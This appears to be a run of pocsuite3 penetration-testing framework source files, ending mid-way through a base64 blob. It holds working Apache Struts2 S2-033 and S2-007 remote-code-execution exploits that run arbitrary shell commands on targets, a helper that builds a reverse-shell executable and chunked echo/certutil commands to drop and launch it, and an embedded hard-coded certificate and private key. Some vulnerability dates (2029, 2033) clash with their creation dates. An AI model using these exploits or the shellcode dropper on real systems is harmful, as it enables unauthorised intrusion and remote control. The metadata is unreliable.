            output = Output(self)

        except BaseException as e:
            self.expt = (ERROR_TYPE_ID.OTHER, e)
            logger.error("PoC has raised a exception")
            logger.error(str(traceback.format_exc()))
            # logger.exception(e)
            output = Output(self)
        if output:
            output.params = self.params
        return output

    def _check(self, dork='', allow_redirects=False, return_obj=False, is_http=True, honeypot_check=True):
        if conf.get('no_check', False):
            return True

        u = urlparse(self.url)
        # the port closed
        if u.port and not check_port(u.hostname, u.port):
            logger.debug(f'{mosaic(self.url)}, the port is closed.')
            return False

        if is_http is False or self.current_protocol != POC_CATEGORY.PROTOCOL.HTTP:
            return True

        res = None
        # this only covers most cases
        redirect_https_keyword = [
            # https://www.zoomeye.org/searchResult?q=%22request%20was%20sent%20to%20HTTPS%20port%22
            'request was sent to https port',
            # https://www.zoomeye.org/searchResult?q=%22running%20in%20SSL%20mode.%20Try%22
            'running in ssl mode. try'
        ]
        redirect_https_keyword_found = False
        origin_url = self.url
        netloc = self.url.split('://', 1)[-1]
        urls = OrderedSet()
        urls.add(self.url)
        urls.add(f'http://{netloc}')

        # The user has not provided a port in URL, dynamically switching to HTTPS's default port 443
        pr = urlparse(self.url)
        is_ipv6 = pr.netloc.startswith('[')
        if ':' not in self.target.split('://')[-1] and pr.port == 80:
            pr = pr._replace(scheme='https')
            pr = pr._replace(netloc=f'[{pr.hostname}]:443' if is_ipv6 else f'{pr.hostname}:443')
            urls.add(pr.geturl())
        else:
            urls.add(f'https://{netloc}')

        for url in urls:
            try:
                time.sleep(0.1)
                res = requests.get(url, allow_redirects=allow_redirects)
                """
                https://github.com/knownsec/pocsuite3/issues/330
                https://github.com/knownsec/pocsuite3/issues/356
                status_code:
                    - 20x
                    - 30x
                    - 40x
                    - 50x
                """

                # if HTTPS handshake is successful, return directly
                if url.startswith('https://'):
                    break

                # if we send an HTTP request to an HTTPS service, but the server may return 20x
                for k in redirect_https_keyword:
                    if k.lower() in res.text.lower():
                        redirect_https_keyword_found = True
                        break
                if redirect_https_keyword_found:
                    continue

                # if we send an HTTP request to an HTTPS service, the server may return 30x, 40x, or 50x...
                if not str(res.status_code).startswith('20'):
                    continue

                break
            except requests.RequestException:
                pass

        if not isinstance(res, requests.Response):
            return False

        self.url = res.request.url.rstrip('/')
        if res.history:
            self.url = res.history[0].request.url.rstrip('/')

        if self.url.split('://')[0] != self.scheme:
            self.url = self.build_url(self.url)
            logger.warn(f'auto correct url: {mosaic(origin_url)} -> {mosaic(self.url)}')

        if return_obj:
            return res

        content = str(res.headers).lower() + res.text.lower()
        dork = dork.lower()

        if dork not in content:
            return False

        if not honeypot_check:
            return True

        is_honeypot = False

        # detect honeypot
        # https://www.zoomeye.org/searchResult?q=%22GoAhead-Webs%22%20%2B%22Apache-Coyote%22
        keyword = [
            'goahead-webs',
            'apache-coyote',
            'upnp/',
            'openresty',
            'tomcat'
        ]

        sin = 0
        for k in keyword:
            if k in content:
                sin += 1

        if sin >= 3:
            logger.debug(f'honeypot: sin({sin}) >= 3')
            is_honeypot = True

        # maybe some false positives
        elif len(re.findall('<title>(.*)</title>', content)) > 5:
            logger.debug('honeypot: too many title')
            is_honeypot = True

        elif len(re.findall('basic realm=', content)) > 5:
            logger.debug('honeypot: too many www-auth')
            is_honeypot = True

        elif len(re.findall('server: ', content)) > 5:
            logger.debug('honeypot: too many server')
            is_honeypot = True

        if is_honeypot:
            logger.warn(f'{mosaic(self.url)} is a honeypot.')

        return not is_honeypot

    def _shell(self):
        """
        @function   以Poc的shell模式对urls进行检测(具有危险性)
                    需要在用户自定义的Poc中进行重写
                    返回一个Output类实例
        """
        raise NotImplementedError

    def _attack(self):
        """
        @function   以Poc的attack模式对urls进行检测(可能具有危险性)
                    需要在用户自定义的Poc中进行重写
                    返回一个Output类实例
        """
        raise NotImplementedError

    def _verify(self):
        """
        @function   以Poc的verify模式对urls进行检测(可能具有危险性)
                    需要在用户自定义的Poc中进行重写
                    返回一个Output类实例
        """
        raise NotImplementedError

    def parse_output(self, result={}):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

    def _run(self):
        """
        @function   以Poc的GUI模式对url进行检测(可能具有危险性)
                    需要在用户自定义的Poc中进行重写
                    返回一个Output类实例
        """
        raise NotImplementedError


class Output(object):
    def __init__(self, poc=None):
        self.error_msg = tuple()
        self.result = {}
        self.params = {}
        self.status = OUTPUT_STATUS.FAILED
        if poc:
            self.url = poc.url
            self.mode = poc.mode
            self.vul_id = poc.vulID
            self.name = poc.name
            self.app_name = poc.appName
            self.app_version = poc.appVersion
            self.error_msg = poc.expt
            self.poc_attrs = {}
            for i in inspect.getmembers(poc):
                if not i[0].startswith('_') and type(i[1]) in [str, list, dict]:
                    self.poc_attrs[i[0]] = i[1]

    def is_success(self):
        return bool(True and self.status)

    def success(self, result):
        assert isinstance(result, dict)
        self.status = OUTPUT_STATUS.SUCCESS
        self.result = result

    def fail(self, error=""):
        assert isinstance(error, str)
        self.status = OUTPUT_STATUS.FAILED
        self.error_msg = (0, error)

    def error(self, error=""):
        self.expt = (ERROR_TYPE_ID.OTHER, error)
        self.error_msg = (0, error)

    def show_result(self):
        if self.status == OUTPUT_STATUS.SUCCESS:
            for k, v in self.result.items():
                if isinstance(v, dict):
                    for kk, vv in v.items():
                        if (kk == "URL" or kk == "IP"):
                            vv = mosaic(vv)
                        logger.log(CUSTOM_LOGGING.SUCCESS, "%s : %s" % (kk, vv))
                else:
                    if (k == "URL" or k == "IP"):
                        v = mosaic(v)
                    logger.log(CUSTOM_LOGGING.SUCCESS, "%s : %s" % (k, v))

    def to_dict(self):
        return self.__dict__



from dataclasses import dataclass, field

from pocsuite3.lib.core.log import LOGGER as logger
from pocsuite3.modules.interactsh import Interactsh


@dataclass
class InteractshClient:
    client: Interactsh = field(default_factory=Interactsh)
    interactsh_protocol: list = field(default_factory=list)
    interactsh_request: list = field(default_factory=list)
    interactsh_response: list = field(default_factory=list)

    def poll(self) -> None:
        results = self.client.poll()
        for result in results:
            logger.debug(result)
            self.interactsh_protocol.append(result['protocol'])
            self.interactsh_request.append(result['raw-request'])
            self.interactsh_response.append(result['raw-response'])



import requests
from requests._internal_utils import to_native_string
from requests.compat import is_py3


def get_redirect_target(self, resp):
    """hook requests.Session.get_redirect_target method"""
    if resp.is_redirect:
        location = resp.headers['location']
        if is_py3:
            location = location.encode('latin1')

        # fix https://github.com/psf/requests/issues/4926
        encoding_list = ['utf-8']
        if resp.encoding and resp.encoding not in encoding_list:
            encoding_list.append(resp.encoding)
        if resp.apparent_encoding and resp.apparent_encoding not in encoding_list:
            encoding_list.append(resp.apparent_encoding)
        encoding_list.append('latin1')

        for encoding in encoding_list:
            try:
                return to_native_string(location, encoding)
            except Exception:
                pass
    return None


def patch_redirect():
    requests.Session.get_redirect_target = get_redirect_target



import getpass
from configparser import ConfigParser

from pocsuite3.lib.request import requests
from pocsuite3.lib.core.data import logger, paths


class Seebug():
    def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
        self.url = 'https://www.seebug.org/api'
        self.headers = {'User-Agent': 'curl/7.80.0'}
        self.token = token
        self.pocs = []
        self.conf_path = conf_path

        if self.conf_path:
            self.parser = ConfigParser()
            self.parser.read(self.conf_path)
            try:
                self.token = self.token or self.parser.get('Seebug', 'token')
            except Exception:
                pass

        self.check_token()

    def token_is_available(self):
        if self.token:
            try:
                self.headers['Authorization'] = f'Token {self.token}'
                resp = requests.get(f'{self.url}/user/poc_list', headers=self.headers)
                if resp and resp.status_code == 200:
                    self.pocs = resp.json()
                    return True
                else:
                    logger.info(resp.text)
            except Exception as ex:
                logger.error(str(ex))
        return False

    def check_token(self):
        if self.token_is_available():
            return True

        while True:
            self.token = getpass.getpass('Seebug API token: (input will hidden)')
            if self.token_is_available():
                self.write_conf()
                return True
            else:
                logger.error('The Seebug api token is incorrect, Please enter the correct api token.')

    def write_conf(self):
        if not self.parser.has_section('Seebug'):
            self.parser.add_section('Seebug')
        try:
            self.parser.set('Seebug', 'token', self.token)
            self.parser.write(open(self.conf_path, 'w'))
        except Exception as ex:
            logger.error(str(ex))

    def get_available_pocs(self):
        return self.pocs

    def search_poc(self, keyword):
        try:
            resp = requests.get(f'{self.url}/user/poc_list?q={keyword}', headers=self.headers)
            if resp and resp.status_code == 200:
                pocs = resp.json()
                return pocs
        except Exception as ex:
            logger.error(str(ex))
        return []

    def fetch_poc(self, ssvid):
        try:
            if ssvid and ssvid.startswith('ssvid-'):
                ssvid = ssvid.split('ssvid-')[-1]
            resp = requests.get(f'{self.url}/user/poc_detail?id={ssvid}', headers=self.headers)
            content = resp.json()
            if resp and resp.status_code == 200 and 'code' in content:
                poc = content['code']
                return poc
            elif resp.status_code == 200 and 'status' in content and content['status'] is False:
                if 'message' in content:
                    msg = content['message']
                    if msg == "没有权限访问此漏洞":
                        msg = "No permission to access the vulnerability PoC"
                else:
                    msg = "Unknown"
                msg = "[PLUGIN] Seebug:" + msg
                raise Exception(msg)
        except Exception as ex:
            logger.error(str(ex))
        return ''


if __name__ == "__main__":
    sb = Seebug()
    print(sb.search_poc('redis'))
    print(sb.get_available_pocs())
    print(sb.fetch_poc(ssvid='89715'))



from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2029-5-8'
    createDate = '2019-5-8'
    updateDate = '2019-5-8'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-033']
    name = 'Apache Struts2 s2-033'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-033:影响版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3)'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        check_poc = "%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]%2b602%2b53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086"
        html = requests.get(self.url + "!" + check_poc).text
        if '1008660253718' in html:
            result["VerifyInfo"] = {
                "URL": self.url
            }
            return result
        return False

    def _attack(self):
        p = self._check()
        result = {}
        if p:
            exec_payload = "%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command={cmd}"
            cmd = self.get_option("command")
            url = self.url + "!" + exec_payload.format(cmd=quote(cmd))
            html = requests.get(self.url + "!" + exec_payload.format(cmd=quote(cmd)))
            if html:
                result["VerifyInfo"] = {
                    "result": html.text.replace("\x00", "").encode(),
                }

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



import itertools
from collections import OrderedDict

from pocsuite3.lib.core.common import check_file, get_file_items
from pocsuite3.lib.yaml.nuclei.model import CaseInsensitiveEnum


class AttackType(CaseInsensitiveEnum):
    BatteringRamAttack = "batteringram"
    PitchForkAttack = "pitchfork"
    ClusterBombAttack = "clusterbomb"


def payload_generator(payloads: dict, attack_type: AttackType) -> OrderedDict:
    payloads_final = OrderedDict()
    payloads_final.update(payloads)

    for k, v in payloads_final.items():
        if isinstance(v, str) and check_file(v):
            payloads_final[k] = get_file_items(v)

    payload_keys, payload_vals = payloads_final.keys(), payloads_final.values()
    payload_vals = [i if isinstance(i, list) else [i] for i in payload_vals]

    if attack_type == AttackType.PitchForkAttack:
        for instance in zip(*payload_vals):
            yield dict(zip(payload_keys, instance))
    else:
        for instance in itertools.product(*payload_vals):
            yield dict(zip(payload_keys, instance))



from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str, get_middle_text


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2033-11-15'
    createDate = '2023-11-15'
    updateDate = '2023-11-15'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-007']
    name = 'Apache Struts2 s2-007'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.2.3'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-007:影响版本Struts 2.0.0 - Struts 2.2.3'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        hash_str = random_str(10)
        exec_payload = "'%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()))%20%2B%20'"
        headers = {}
        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        headers["Connection"] = "close"
        command = [
            "echo " + hash_str,
            "cmd.exe /c echo " + hash_str
        ]
        for cmd in command:
            data = "age={exp}"
            data = data.format(exp=exec_payload.format(cmd=quote(cmd)))
            html = requests.post(self.url, data=data, headers=headers).text

            if hash_str in html:
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "PAYLOAD": data
                }

                return result
        return False

    def _attack(self):
        p = self._check()
        result = {}
        if p:
            exec_payload = "'%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()))%20%2B%20'"
            headers = {}
            headers['Content-Type'] = 'application/x-www-form-urlencoded'
            headers["Connection"] = "close"
            command = self.get_option("command")
            data = "age={exp}"
            data = data.format(exp=exec_payload.format(cmd=quote(command)))
            html = requests.post(self.url, data=data, headers=headers).text

            exec_res = get_middle_text(html, "\"age\" value=\"", "\n")
            result["VerifyInfo"] = {
                "URL": self.url,
                "PAYLOAD": data,
                "result": exec_res
            }
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



import re
import ast
import base64
import binascii
import os
import string
import random
from faker import Faker
from socket import gethostbyname
import urllib.parse
from ipaddress import ip_address
from pocsuite3.lib.core.data import logger, paths
from pocsuite3.lib.core.enums import (
    CUSTOM_LOGGING, OS, OS_ARCH, SHELLCODE_CONNECTION
)
# for pocsuite 2.x
from pocsuite3.lib.core.exception import PocsuiteGenericException
from pocsuite3.shellcodes import OSShellcodes


def urlparse(address):
    # https://stackoverflow.com/questions/50499273/urlparse-fails-with-simple-url
    try:
        ip = ip_address(address)
        if ip.version == 4:
            return urllib.parse.urlparse(f'tcp://{address}')
        elif ip.version == 6:
            return urllib.parse.urlparse(f'tcp://[{address}]')
    except ValueError:
        pass

    if not re.search(r'^[A-Za-z0-9+.\-]+://', address):
        address = f'tcp://{address}'
    return urllib.parse.urlparse(address)


def url2ip(url, with_port=False):
    """
    works like turning 'http://baidu.com' => '180.149.132.47'
    """

    url_prased = urlparse(url)
    if url_prased.port:
        ret = gethostbyname(url_prased.hostname), url_prased.port
    elif not url_prased.port and url_prased.scheme == 'https':
        ret = gethostbyname(url_prased.hostname), 443
    else:
        ret = gethostbyname(url_prased.hostname), 80

    return ret if with_port else ret[0]


def str_to_dict(value):
    try:
        return ast.literal_eval(value)
    except ValueError as e:
        logger.log(CUSTOM_LOGGING.ERROR, "conv string failed : {}".format(str(e)))


def random_str(length=10, chars=string.ascii_letters + string.digits):
    return ''.join(random.sample(chars, length))


def generate_random_user_agent():
    return Faker().user_agent()


def get_middle_text(text, prefix, suffix, index=0):
    """
    Simple implementation of obtaining intermediate text

    :param text:Full text to get
    :param prefix:To get the first part of the text
    :param suffix: To get the second half of the text
    :param index: Where to get it from
    :return:
    """
    try:
        index_1 = text.index(prefix, index)
        index_2 = text.index(suffix, index_1 + len(prefix))
    except ValueError:
        # logger.log(CUSTOM_LOGGING.ERROR, "text not found pro:{} suffix:{}".format(prefix, suffix))
        return ''
    return text[index_1 + len(prefix):index_2]


def generate_shellcode_list(listener_ip, listener_port, os_target=OS.WINDOWS, os_target_arch=OS_ARCH.X86,
                            chunked_num=50, profix=None, write_path=None):
    """
    Generate executable shellcode for shell rebound under Windows/Linux. When writing a POC with command execution,
    execute the list returned by this command.

    :param listener_ip: Listening IP
    :param listener_port: Listening port
    :param os_target: System type, default is Windows
    :param os_target_arch: System architecture, the default is x86
    :param chunked_num: Specify how much quantity is one piece, the default is 50
    :param profix: Select the prefix of the command execution, the default is None. Automatically select according to
            the operating system
    :param write_path: The written file directory, when the default is None, Windows will write to the %TEMP% directory,
            Linux will write to the /tmp directory, the file name is random
    :return: list of command
    """

    bad_chars = ["\x00", "\x0a", "\x0d", "\x3b"]
    s = OSShellcodes(os_target, os_target_arch, listener_ip, listener_port, bad_chars)
    connection_type = SHELLCODE_CONNECTION.REVERSE
    filename = random_str(5)
    filepath = os.path.join(paths.POCSUITE_TMP_PATH, filename)
    if os_target == OS.WINDOWS:
        filepath = os.path.join(paths.POCSUITE_TMP_PATH, filename) + '.exe'
    _ = s.create_shellcode(
        connection_type,
        encode='',
        make_exe=1,
        debug=0,
        # dll_inj_funcs=dll_funcs,
        filename=filename,
        # use_precompiled=False
    )
    if not os.path.exists(filepath):
        raise PocsuiteGenericException("generate file does not exist!")
    with open(filepath, 'rb') as f:
        data = f.read()

    os.unlink(filepath)
    if profix is None:
        if os_target == OS.WINDOWS:
            profix = "cmd.exe /q /c "
        elif os_target == OS.LINUX:
            profix = ""

    index = 0
    cmd = []
    rand_str = random_str(4)
    if os_target == OS.WINDOWS:
        data = base64.b64encode(data).decode()
        length = len(data)

        if write_path is None:
            write_path = "%TEMP%"
        filename = r"{path}\{rand}.bs4".format(path=write_path, rand=rand_str)
        filename_out = r"{path}\{rand}.exe".format(path=write_path, rand=rand_str)
        while 1:
            if index > length:
                break
            _cmd = data[index:index + chunked_num]
            flag = ">>"
            if index == 0:
                flag = ">"
            cmd.append(profix + r"echo {payload} {flag} {filename}".format(payload=_cmd, flag=flag, filename=filename))
            index = index + chunked_num
        cmd.append(profix + "certutil -decode {input} {output}".format(input=filename, output=filename_out))
        cmd.append(profix + filename_out)
    elif os_target == OS.LINUX:
        length = len(data)
        echo_prefix = "\\x"
        if write_path is None:
            write_path = "/tmp"
        filename = r"{path}/{rand}".format(path=write_path, rand=rand_str)
        while 1:
            if index > length:
                break

            block = str(binascii.hexlify(data[index:index + chunked_num]), "utf-8")
            block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2]))
            command = profix + 'echo -ne "{}" >> {}'.format(block, filename)
            cmd.append(command)
            index = index + chunked_num
        cmd.append("chmod u+x " + filename)
        cmd.append(profix + filename)

    return cmd


def gen_cert(countryName='',
             stateOrProvinceName='',
             localityName='',
             organizationName='',
             organizationUnitName='',
             commonName='',
             emailAddress='',
             serialNumber=0,
             validityStartInSeconds=0,
             validityEndInSeconds=0,
             filepath="cacert.pem"):

    # openssl library dependencies is too heavy, so we move it to extras_require
    try:
        from OpenSSL import crypto
        fake = Faker()
        domain_name = fake.domain_name()
        yr = 24 * 3600 * 365
        vf = -1 * random.randint(0, yr * 3) - yr
        vt = vf + random.randint(5, 9) * yr
        # create a key pair
        k = crypto.PKey()
        k.generate_key(crypto.TYPE_RSA, 2048)
        # create a self-signed cert
        cert = crypto.X509()
        cert.get_subject().C = countryName or 'US'
        cert.get_subject().ST = stateOrProvinceName or fake.state_abbr()
        cert.get_subject().L = localityName or fake.city()
        cert.get_subject().O = organizationName or fake.company()
        cert.get_subject().OU = organizationUnitName or fake.bs().split()[-1]
        cert.get_subject().CN = commonName or domain_name
        cert.get_subject().emailAddress = emailAddress or fake.email().split('@')[0] + '@' + domain_name
        serialNumber = serialNumber or (random.randint(0, 0xffffffff - 1) << 32) + random.randint(0, 0xffffffff - 1)
        cert.set_serial_number(serialNumber)
        cert.gmtime_adj_notBefore(validityStartInSeconds or vf)
        cert.gmtime_adj_notAfter(validityEndInSeconds or vt)
        cert.set_issuer(cert.get_subject())
        cert.set_version(2)
        cert.set_pubkey(k)
        cert.sign(k, 'sha256')
        logger.info("Successfully generated a self-signed certificate")
        with open(filepath, "wb+") as fw:
            fw.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
            fw.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
    except ImportError:
        logger.warning('pyOpenSSL not installed, use hard-code certificate instead')
        # base64 encoding to avoid cert leak warning
        hard_coded_cert_base64 = (
            b'LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUR2akNDQXFhZ0F3SUJBZ0lJWVNpZnhqek80'
            b'elF3RFFZSktvWklodmNOQVFFTEJRQXdnWjR4Q3pBSkJnTlYKQkFZVEFsVlRNUXN3Q1FZRFZRUUlE'
            b'QUpPU2pFWk1CY0dBMVVFQnd3UVYyVnpkQ0JCYm5Sb2IyNTViR0Z1WkRFVwpNQlFHQTFVRUNnd05V'
            b'Mk5vYm1WcFpHVnlJRXhNUXpFVk1CTUdBMVVFQ3d3TVlXTjBhVzl1TFdsMFpXMXpNUkV3CkR3WURW'
            b'UVFEREFoamFHVnVMbUpwZWpFbE1DTUdDU3FHU0liM0RRRUpBUllXWVd4c2FYTnZibTFwYkd4bGNr'
            b'QmoKYUdWdUxtSnBlakFlRncweU1EQXhNREV4TkRBeE1UVmFGdzB5T0RFeU1qa3hOREF4TVRWYU1J'
            b'R2VNUXN3Q1FZRApWUVFHRXdKVlV6RUxNQWtHQTFVRUNBd0NUa294R1RBWEJnTlZCQWNNRUZkbGMz'
            b'UWdRVzUwYUc5dWVXeGhibVF4CkZqQVVCZ05WQkFvTURWTmphRzVsYVdSbGNpQk1URU14RlRBVEJn'
            b'TlZCQXNNREdGamRHbHZiaTFwZEdWdGN6RVIKTUE4R0ExVUVBd3dJWTJobGJpNWlhWG94SlRBakJn'
            b'a3Foa2lHOXcwQkNRRVdGbUZzYkdsemIyNXRhV3hzWlhKQQpZMmhsYmk1aWFYb3dnZ0VpTUEwR0NT'
            b'cUdTSWIzRFFFQkFRVUFBNElCRHdBd2dnRUtBb0lCQVFDeXFHdFJBUGNHCkF4SGZsTm1oV3BBKzJK'
            b'ZVArZVg1ejN4OXJaWkVsWVJhTm04bWhNd25PbW83Z3ppOENEM0k0SXIvc3ArZG1uejQKUUpENTZi'
            b'NUh5bzVNbHB4Y0dtcmxTYkRzWmlrRTBHWmZBcG9oVjVFMy9XUFBDaHFJSGxpWlBUZGEwaG1sZ1ha'
            b'NwpzRmpMcmZtcEFQcmt2OGdmV0ZjNlZsaCtsbFFpMnRNMm9MYTdMaVBTeVdycXc5NjVXZG9rTzRJ'
            b'b29HQ25XUUI4CkpiVmlYZEpFNEduZVF0cDBiQXplbzFsdHNadXNGOCtDdmQ2dGxSV0ZWZmUrd3Yv'
            b'TU00UnpYYUFwTGpXSU5Ta2IKMmlWbWI5QmtpZ09VRHF6WUhlRzNWUGZKKzE2cjRicGZxZXljR3hu'
            b'clkyL2Zpa0diRDRHVHRuZ1RITkovcWx5Ugp1Sjd0UkFzMTNUVHpBZ01CQUFFd0RRWUpLb1pJaHZj'
            b'TkFRRUxCUUFEZ2dFQkFES0txR1dyS1ZWcEd1YmVubk5mCnp1Y1BvQk5jb0w2a2kzMVE1SmxKM09Q'
            b'SVJtV3E4aGsycGlyeUxENkNCRER5VnUwd2Jtcnc2bHNrRWZRZE9qVW0KK1cxVElVQzJJeXJUT0w3'
            b'RUY2YTdtT294VnZOSERnQ1JMaHZxakZtN2FlRE1ZMGpueGNycFJjUC9hRVJxSmRHWQovYWlSRDV5'
            b'T0w3U2djVVd4ZEt6TmZiRzViOFcyVUNvTXdOS1NYcTJVRUR6d1U1RUZseTZsSFA3dTN0SE5QOGV6'
            b'Ck9sU0VaUDdxTCswc0l4SitYeEk2ZGNPQzRVTXNSTGFLYjFHNXFoemFhRTFZU3FWWC9LcVBITUgz'
            b'QzhXUXZJdUIKeE8vR2p6cHhBSmRXZzhJYU1qdWZPWExUMW15ZXJnZDU3b29SUVh1OVRJQzdjZG84'
            b'N3Rjei9IMnk1aE83Vkkxbwo2SVU9Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0KLS0tLS1CRUdJ'
            b'TiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2Z0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktnd2dn'
            b'U2tBZ0VBQW9JQkFRQ3lxR3RSQVBjR0F4SGYKbE5taFdwQSsySmVQK2VYNXozeDlyWlpFbFlSYU5t'
            b'OG1oTXduT21vN2d6aThDRDNJNElyL3NwK2Rtbno0UUpENQo2YjVIeW81TWxweGNHbXJsU2JEc1pp'
            b'a0UwR1pmQXBvaFY1RTMvV1BQQ2hxSUhsaVpQVGRhMGhtbGdYWjdzRmpMCnJmbXBBUHJrdjhnZldG'
            b'YzZWbGgrbGxRaTJ0TTJvTGE3TGlQU3lXcnF3OTY1V2Rva080SW9vR0NuV1FCOEpiVmkKWGRKRTRH'
            b'bmVRdHAwYkF6ZW8xbHRzWnVzRjgrQ3ZkNnRsUldGVmZlK3d2L01NNFJ6WGFBcExqV0lOU2tiMmlW'
            b'bQpiOUJraWdPVURxellIZUczVlBmSisxNnI0YnBmcWV5Y0d4bnJZMi9maWtHYkQ0R1R0bmdUSE5K'
            b'L3FseVJ1Sjd0ClJBczEzVFR6QWdNQkFBRUNnZ0VBTTd6b1R5NExXM2RhSHJoNWlldXpLREFMUEV1'
            b'dldQZklZcEQ1bW1UK1RpM0QKWkpGQ21mMmx0QlJkUXI3VVBhOGhNY2xseGZ0dVEycFhVYmhxUFZv'
            b'Z2VYZUlVbmZvQ3Z5Yk91cWU2R0Q5dEhnSgpjS3h1UnB1ZjR0NVhMcUl6SURXRktVejgxbHcybHIx'
            b'TUNiZ1pPK01ueFVUd3pIc0Z6OFFmbnBFa1RtKzJpUFBuCml5WUc5YVBqSU90cWNFandxaEJhWWFt'
            b'NVpwM0VOaEJpbkxjemhMb2srVlFnbkxwYlZXU29HbjZTZE5XcWRsbUQKdWxaYVZub1NSWkEwVzgy'
            b'UjhLR01naVUyWUFHamphdmdBeGlBQXNoL1VwSE9nOVBFZHpNMEM5TGZWM2VEY3dQTAp3RXJicldE'
            b'V1B2RXNidy9menkvRXJodEFDbVRFeExoazV2NGVqSnMzcVFLQmdRRG9jam9GTS9OcUpoWGVVRnQ3'
            b'CnV3UCt5TWF6cnVUYnpBV0xKcGptSnlMTEVqNWZqWjhQVi9HUFkxTVAwYjY5TVJzbS9tZ3MyZGIz'
            b'Q2JYS1pTRzcKZTZDRWlVMGdRODFPSVBUWitDUGx1Y1JaVVR2N3hHZU5SOEVUUjMzS1M5MmhZWEpJ'
            b'cFZCNm1kWUlXNFpvSXhuTwpaa09NTFM4SU40WWlrNnJsam04NTZyUEd0UUtCZ1FERXd1VnhTK2ov'
            b'Z01IZGowVG12WHJYbkVjYmxmd1ZhOU1wCnVEUTZIeVhubHFlL0xzb3ZFcmcrV2NFS2FURERmY2k2'
            b'TWZXdzRpVjRDRUdjNHhJeGNwbUY2elFMWFJieGVZK3YKMDZ0KzBtdjI2bkdxeUdOYmlBS1FMYjRw'
            b'SmxCU290c1Z2VGJHTjJzRGRkVTIzN2t0cHpQZ3FmSXZlbUFuZDBseApkU0N1L3UxdUJ3S0JnUURP'
            b'WVh6NldhSHB3Vjd4UUUrNWo5YUFSU3VISmVXMDhYU0trLzUxZXBIOTAzamx4Z3hQCnh6bUdvaDJC'
            b'a2l6VU5lRnh3YmdrK2xWT2lhU0t5emdrQ2lQL0NSa2RhSlhFcEtaQlVYd3QzNzVodnlxTzQxYzkK'
            b'clZQVUZrbXRiNmFjUHJVRm95SE5lUUQ3OHFkbmxxSzNDejAySEhnQng2cWswSStQdWVNdmZSK1pj'
            b'UUtCZ0M3SQpJQUZtQ1FubXRURldoUTFQYzh1YnpwUlNmdE1oQmQzZmZCdHRtSGVOckdpYVdWd0Qy'
            b'V2FKdElvakpJTDJmeWsyCkE3S0FzbVB0b3B3SXFTUzBtS2ZzbWoweGJ1a08vQWpVRE94a1gyTWZy'
